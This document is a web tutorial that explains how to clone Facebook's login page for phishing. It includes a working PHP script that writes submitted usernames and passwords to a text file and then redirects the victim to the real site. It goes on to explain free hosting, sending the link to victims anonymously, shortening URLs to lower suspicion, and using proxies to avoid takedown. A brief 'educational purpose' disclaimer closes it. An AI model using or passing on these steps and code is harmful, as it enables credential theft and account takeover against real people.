PHISHING

Phishing is attempting to acquire information (and sometimes, indirectly, money) such as usernames, passwords, and credit card details by masquerading as a trustworthy entity in an electronic communication. Communications purporting to be from popular social web sites, auction sites, online payment processors or IT administrators are commonly used to lure the unsuspecting public. Phishing is typically carried out by e-mail spoofing or instant messaging, and it often directs users to enter details at a fake website whose look and feel are almost identical to the legitimate one. Phishing is an example of social engineering techniques used to deceive users, and exploits the poor usability of current web security technologies. Attempts to deal with the growing number of reported phishing incidents include legislation, user training, public awareness, and technical security measures.

So in this tutorial am going to show you how to create a fake login page for phishing, in this case we will be using facebook, following this procedures you can make fake pages of any other website like Hotmail, yahoo! And many others.

Step 1: go to the website facebook.com and then right click on the page, then you will see an option view source page. click on that.

Step 2: now a new windows will appear, then select all and copy it, to do this press Ctrl+A and then Ctrl+C.

Step 3: now open a notepad and paste it on a notepad then press Ctrl+F and find action="https://www.facebook.com/login.php?login_attempt=1"

Step 4: delete the text https://www.facebook.com/login.php?login_attempt=1 and replace it with action=”post.php”.

Step 5: now save the notepad you have created as index.htm remember it is not index.html

Step 6: Now your phishing page is ready.it will look like a pic given below.

Step 7: Open a new notepad and save the given data with the name post.php.

<?php

header ('Location:http://www.facebook.com/');

$handle = fopen("usernames.txt", "a");

foreach($_POST as $variable => $value) {

   fwrite($handle, $variable);

   fwrite($handle, "=");

   fwrite($handle, $value);

   fwrite($handle, "\r\n");

}

fwrite($handle, "\r\n");

fclose($handle);

exit;

?>

Step 8: now you have two files index.htm and post.php. Now upload them to a webhosting site, there are many webhosting sites like 000webhost.com, byethost.com, spam.com, 110mb.com and more. Choose the one that is satisfies your option. In my opinion I recommend you to use 000webhosting.com or byethost.com since they are easy and free to use. click here to upload your files.

 

Step 9: you need to sign up (if you don’t have an account). before signup the page will look like the screenshot below.

Step 10: now goto control panel and then file manager and a new window will appear with an option of resend and cancel. Click resend to continue.

Step 11: after you do the above steps you will get into your file manager then click and open public html then delete default.php and upload the two files index.htm and post.php .

Sep 12: Now the last step is to copy your website’s url, which is found at the top right corner.

NOTE- Now you can create a new email anonymously then send your site to your victims, so that you can gain information. Also It is better if your website’s url is tiny like co.nr, co.cz…so that the user (victim) will have less suspicious about your fake page. It is also better if you use a private network or proxy since this is not legal, otherwise they will close your website immediately.

This trick is a simple way for hacking a facebook. This is only for educational purpose, I wouldn’t recommend you to use this method on anybody. Phishing is an illegal activity.